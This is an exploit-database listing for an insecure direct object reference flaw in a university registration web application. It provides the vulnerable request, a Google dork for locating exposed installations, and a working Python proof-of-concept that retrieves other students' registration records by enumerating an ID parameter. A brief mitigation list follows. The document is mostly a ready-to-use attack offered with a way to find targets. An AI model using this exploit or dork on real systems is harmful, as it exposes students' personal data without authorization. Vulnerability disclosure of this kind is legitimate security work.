Exploit for University Registration System 1.0 Insecure Direct Object Reference

Name: Exploit for University Registration System 1.0 Insecure Direct Object Reference
Rating: 5 (32 reviews)
2025-03-27 | CVSS 6.9
## https://sploitus.com/exploit?id=PACKETSTORM:190065
# Exploit Title: University Registration System - IDOR Leads to Information Disclosure
    # Date: 2025-03-25
    # Exploit Author: wa0_3/td9_l
    # Telegram: @wa0_3/@td9_l
    # Vendor Homepage: https://informatique-eg.com/
    # Version: 1.0
    # Tested on: https://demo.informatique-eg.com/
    # Category: WebApps
    # CVE: N/A
    
    ## Description:
    An Insecure Direct Object Reference (IDOR) vulnerability was discovered in the University Registration System, allowing unauthorized users to access and modify registration details of other students by manipulating the `paramPgregistrationId` parameter.
    
    ## Vulnerable Endpoint:
    ```
    GET Registration/PG/PG_Register.aspx?paramPgregistrationId=(id) HTTP/1.1
    Host: target-university.edu
    Cache-Control: max-age=0
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Cookie: ASP.NET_SessionId=gky2cc33uoduykncb5mrz5e3
    Connection: keep-alive
    ```
    
    ## Google Dork:
    ```
    inurl:Registration/PG/PG_Register.aspx
    ```
    
    ## Proof of Concept (PoC):
    ```python
    import argparse
    import requests
    
    parser = argparse.ArgumentParser(description='Exploit IDOR in University Registration System')
    parser.add_argument('-url', help='Target URL (e.g., http://example.com)', required=True)
    parser.add_argument('-id', help='Target Registration ID', required=True)
    args = parser.parse_args()
    
    url = f"{args.url}Registration/PG/PG_Register.aspx?paramPgregistrationId={args.id}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "keep-alive"
    }
    
    response = requests.get(url, headers=headers)
    
    if response.status_code == 200:
        print("[+] Exploit Successful!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit Failed")
    ```
    
    ## Impact:
    An attacker can enumerate `paramPgregistrationId` values to view and potentially modify sensitive student registration details without authentication.
    
    ## Mitigation:
    - Implement proper access control checks to ensure only authorized users can access their own data.
    - Use session-based authentication to verify user privileges before serving sensitive data.
    - Implement rate limiting and monitoring to detect abnormal access patterns.
    
    ## Credits:
    Discovered by **wa0_3** (@wa0_3)